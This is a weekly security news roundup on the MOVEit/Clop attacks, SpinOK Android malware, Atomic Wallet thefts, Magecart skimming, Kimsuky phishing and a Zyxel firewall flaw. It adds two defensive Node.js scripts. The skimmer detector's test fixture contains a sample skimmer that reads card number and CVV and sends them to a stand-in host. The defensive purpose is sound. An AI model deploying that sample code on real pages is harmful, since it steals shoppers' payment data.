With cybercrime on the rise, warding off attacks means keeping up with the latest developments in cybersecurity. Here is this week's roundup of security news.


MOVEit Extortion Attacks Attributed to Clop Ransomware

The notorious Clop ransomware group has claimed responsibility for the recent MOVEit Transfer data-theft attacks and says it exploited a zero-day vulnerability in the product over the US Memorial Day holiday weekend.

The claim is consistent with Microsoft's attribution of the attacks to the group it tracks as Lace Tempest, which overlaps with the actor known as TA505. Clop is notorious for running large-scale exploitation campaigns over holidays, when organizations are understaffed, as it did with the Accellion FTA zero-day attacks over Christmas 2020.

The gang says it has not yet begun extorting victims; it is first reviewing the stolen data to identify what can be leveraged for ransom demands.

Affected organizations are starting to come forward. Zellis, a UK payroll and HR solutions provider, has confirmed that it was hit through the MOVEit attacks.


Increasing Number of Apps Found to Contain SpinOK Android Malware With 30 Million Installations

CloudSEK's security team has discovered a new batch of Android apps on Google Play carrying the SpinOK malware, with a combined install count reported at more than 30 million.

The team found 193 apps bundling the malicious SDK (Software Development Kit), on top of another 101 previously identified by Dr. Web. Of these, 43 were still available on Google Play at the time of reporting.

SpinOK, first detected by Dr. Web in a set of apps downloaded more than 400 million times, spreads through an SDK supply chain attack: it poses as a legitimate mini-game SDK that developers embed in their apps, while quietly stealing files and tampering with clipboard contents. Despite CloudSEK's notification to Google, many of the identified apps remain available for download on Google Play.

Image: Android malware

Installing only the applications you actually need, and avoiding unknown ones, reduces the chance of falling victim to campaigns like this.


Crypto Theft Surpasses $35 Million as a Result of Atomic Wallet Hacks

Atomic Wallet, a popular mobile and desktop cryptocurrency wallet, is investigating reports of a significant crypto theft from users’ wallets. 

Following the reports of compromised wallets, Atomic Wallet has been working with third-party security firms to trace and block the stolen funds, and has temporarily taken its download server offline while it investigates.

Blockchain sleuth ZachXBT has been monitoring the stolen funds and estimates the total to exceed $35 million across various cryptocurrencies. Atomic Wallet users have reported the theft on social media, prompting the wallet’s team to collect information from victims to aid their investigation. 

It remains unclear how the compromise occurred, and users are advised to transfer their assets to alternative wallets while the security incident is under scrutiny.


Credit Card Stealer Scripts Hosted on Legitimate Sites Following Hijacking by Threat Actors

In a new Magecart-style credit card skimming campaign, threat actors are hijacking legitimate websites and using them as makeshift C2 (Command and Control) servers for their skimmer code.

Akamai researchers tracking the campaign have found victims in the USA, Australia, the UK, Brazil, Peru, and Estonia. The attackers exploit vulnerabilities in legitimate sites and stage the skimmer there, so that the malicious script is delivered to victim sites from a domain with a clean reputation, which helps it slip past detection.

Image: credit card fraud statistics (sourced from pinterest.com)

The skimmer hides its data theft behind obfuscation such as Base64 encoding and by mimicking well-known services like Google Tag Manager and Facebook Pixel, so that a casual look at the page source shows nothing out of the ordinary.

To guard against Magecart-style infections, website owners should secure their admin accounts and keep their CMS (Content Management System) and plugins up to date. Shoppers can reduce their exposure by paying through electronic payment services, using virtual cards, or setting transaction limits on their credit cards.
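As an added illustration (not code from the Akamai research or from the original article), the Node.js script below triages page scripts for the two tells described above: a loader that imitates Google Tag Manager or Facebook Pixel but fetches from a host that is not Google's or Facebook's, and a long Base64 blob that decodes to code reaching for payment-form fields. The trusted-host list, the field-name list, the 40-character Base64 threshold and both sample scripts (including the hijacked-example.com host) are constructed assumptions for the example.

```javascript
// Added example: heuristic triage of page scripts for Magecart-style skimmers.
// Not a replacement for a proper scanner; the lists below are assumptions.

// Hosts the genuine services load from (assumed allow-list; extend per site).
const TRUSTED_HOSTS = ['googletagmanager.com', 'connect.facebook.net'];

// Field names a skimmer typically reads once it hooks a checkout form (assumed).
const SKIMMER_TERMS = ['cardnumber', 'card_number', 'ccnum', 'cvv', 'cvc', 'expiry'];

// Runs of 40+ Base64-alphabet characters, optionally padded: the usual hiding place.
const B64_RE = /[A-Za-z0-9+/]{40,}={0,2}/g;

function decodeBase64(token) {
  // Random identifiers that happen to match B64_RE decode to binary junk;
  // return '' for anything non-printable so it can never match SKIMMER_TERMS.
  const text = Buffer.from(token, 'base64').toString('utf8');
  return /^[\x20-\x7e\s]*$/.test(text) ? text : '';
}

// Every host the script text references via an http(s) URL.
function extractHosts(src) {
  const hosts = new Set();
  const re = /https?:\/\/([a-z0-9.-]+)/gi;
  let m;
  while ((m = re.exec(src)) !== null) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

function isTrustedHost(host) {
  // Exact match or a subdomain; "googletagmanager.com.evil.test" is NOT trusted.
  return TRUSTED_HOSTS.some(t => host === t || host.endsWith('.' + t));
}

function triageScript(name, src) {
  const findings = [];

  // Tell 1: looks like GTM / Pixel but loads from somewhere else.
  const mimicsGtm = /googletagmanager|\bgtm\b|datalayer/i.test(src);
  const mimicsPixel = /fbq\(|fbevents|facebook pixel/i.test(src);
  const untrusted = extractHosts(src).filter(h => !isTrustedHost(h));
  if ((mimicsGtm || mimicsPixel) && untrusted.length > 0) {
    const service = mimicsGtm ? 'Google Tag Manager' : 'Facebook Pixel';
    findings.push(`imitates ${service} but loads from ${untrusted.join(', ')}`);
  }

  // Tell 2: a Base64 blob whose plaintext references card fields.
  for (const token of src.match(B64_RE) || []) {
    const plain = decodeBase64(token).toLowerCase();
    const hits = SKIMMER_TERMS.filter(t => plain.includes(t));
    if (hits.length > 0) {
      findings.push(`Base64 blob decodes to skimmer-like code (${hits.join(', ')})`);
    }
  }

  return { name, suspicious: findings.length > 0, findings };
}

// --- constructed samples -----------------------------------------------------

// The genuine GTM loader, as a site owner would paste it.
const LEGIT_GTM = "(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s);j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-XXXXXX');";

// A mimic: same shape, but the loader host is a hijacked third-party site and
// the real payload is hidden in Base64 and eval'd. Host and payload are made up.
const SKIMMER_PAYLOAD = "var n=document.querySelector('input[name=cardnumber]').value,c=document.querySelector('input[name=cvv]').value;new Image().src='https://hijacked-example.com/gtm.php?d='+btoa(n+'|'+c);";
const FAKE_GTM = "(function(){var s=document.createElement('script');s.src='https://hijacked-example.com/gtm.js?id=GTM-XXXXXX';document.head.appendChild(s);eval(atob('" + Buffer.from(SKIMMER_PAYLOAD).toString('base64') + "'));})();";

function triageAll() {
  return [triageScript('legit-gtm', LEGIT_GTM), triageScript('fake-gtm', FAKE_GTM)];
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of triageAll()) {
    console.log(r.name, r.suspicious ? 'SUSPICIOUS' : 'ok', r.findings);
  }
}
```

Run it over the inline and external script bodies scraped from a checkout page. The Base64 check will occasionally flag legitimate minified code that happens to embed an encoded image or font, so treat a hit as a reason to read the script, not as proof of compromise; the host check is the stronger signal, since a real GTM or Pixel loader has no reason to reach any other domain.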


Kimsuky Hackers Impersonate Journalists to Steal Intel, Warn NSA and FBI

The North Korean state-sponsored threat group Kimsuky, also tracked as APT43, has been running spear-phishing campaigns in which it impersonates journalists and academics to gather intelligence.

US and South Korean government agencies issued a joint warning after tracking and analyzing the group's recent activity and lure themes. Kimsuky operates under North Korea's Reconnaissance General Bureau and has conducted large-scale espionage campaigns since at least 2012.

The operators plan their spear-phishing carefully, using email addresses that closely resemble those of real individuals and crafting plausible content to open a conversation and gain the target's trust.

To stay safe, users should use strong passwords, enable MFA (Multi-Factor Authentication), and verify any unsolicited contact against the details published on the official website of the media outlet or institution the sender claims to represent.
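As an added example (not part of the joint advisory or the original article), the Node.js script below implements the check a recipient or mail gateway could run for the lookalike-address tactic described above: it compares a sender against a list of verified contacts, folding Unicode confusables and common ASCII substitutions before measuring edit distance. The contact list, the homoglyph table, the distance threshold and all sample addresses are constructed assumptions.

```javascript
// Added example: flag sender addresses that closely resemble a verified contact.
// The contact list, homoglyph table and threshold are assumptions for illustration.

// Contacts the recipient has verified out of band (constructed).
const KNOWN_CONTACTS = [
  'jane.doe@example-news.org',
  'prof.kim@example-univ.edu',
];

// Substitutions that make an address look right at a glance (assumed, not exhaustive).
const HOMOGLYPHS = { rn: 'm', vv: 'w', '0': 'o', '1': 'l', '3': 'e', '5': 's' };

// Edit distance at or below which an unknown address counts as a lookalike (assumed).
const LOOKALIKE_DISTANCE = 2;

function normalize(addr) {
  // NFKC folds fullwidth and other compatibility code points onto their ASCII
  // forms; the ASCII-level homoglyph substitutions are applied afterwards.
  let s = addr.trim().normalize('NFKC').toLowerCase();
  for (const [from, to] of Object.entries(HOMOGLYPHS)) s = s.split(from).join(to);
  return s;
}

// Standard Levenshtein edit distance (two-row dynamic programming).
function levenshtein(a, b) {
  let prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    const cur = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      cur[j] = Math.min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost);
    }
    prev = cur;
  }
  return prev[b.length];
}

// Returns { sender, verdict, match, distance } where verdict is
// 'known' (exact, case-insensitive), 'lookalike' (near a contact after
// normalization) or 'unknown'.
function assessSender(sender, contacts = KNOWN_CONTACTS) {
  const raw = sender.trim().toLowerCase();
  const exact = contacts.find(c => c.toLowerCase() === raw);
  if (exact) return { sender, verdict: 'known', match: exact, distance: 0 };

  const norm = normalize(sender);
  let best = { match: null, distance: Infinity };
  for (const c of contacts) {
    const d = levenshtein(norm, normalize(c));
    if (d < best.distance) best = { match: c, distance: d };
  }
  const verdict = best.distance <= LOOKALIKE_DISTANCE ? 'lookalike' : 'unknown';
  return { sender, verdict, ...best };
}

if (typeof require !== 'undefined' && require.main === module) {
  // Constructed senders: the real contact, three lookalikes, one stranger.
  for (const s of ['Jane.Doe@example-news.org', 'jane.d0e@example-news.org',
                   'jane.doe@exarnple-news.org', 'jane.doe@examplenews.org',
                   'bob@totally-different.net']) {
    console.log(assessSender(s));
  }
}
```

A 'lookalike' verdict is the case worth acting on: the message comes from an address that is not the contact's but was built to pass as it, which is exactly the pattern in these campaigns. The threshold trades false positives against misses; on a large contact list a distance of 2 will also catch ordinary typos, so route hits to a human rather than block outright, and confirm through the published contact details as the advice above recommends.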


Ongoing Attacks Exploit Critical Flaw in Zyxel Firewall, Warn Experts

A critical command injection vulnerability, identified as CVE-2023-28771, is being widely exploited by malicious actors to install malware on Zyxel networking devices. 

The flaw is present in the default configuration of affected firewall and VPN devices, enabling unauthenticated remote code execution through UDP port 500 using a specially crafted IKEv2 packet. Zyxel released patches on April 25, 2023, urging users of specific product versions to apply them promptly.

Image: Mirai-based botnet malware

CISA (Cybersecurity & Infrastructure Security Agency) has added CVE-2023-28771 to its Known Exploited Vulnerabilities catalog and directed federal agencies to patch by June 21, 2023. Rapid7 has confirmed in-the-wild exploitation of the flaw, including by Mirai-based botnet malware.

System administrators should install the latest Zyxel firmware without delay. Where patching has to wait, restricting which source addresses can reach UDP port 500 on the device is only a stopgap, since the vulnerable IKE service is exposed in the default configuration.
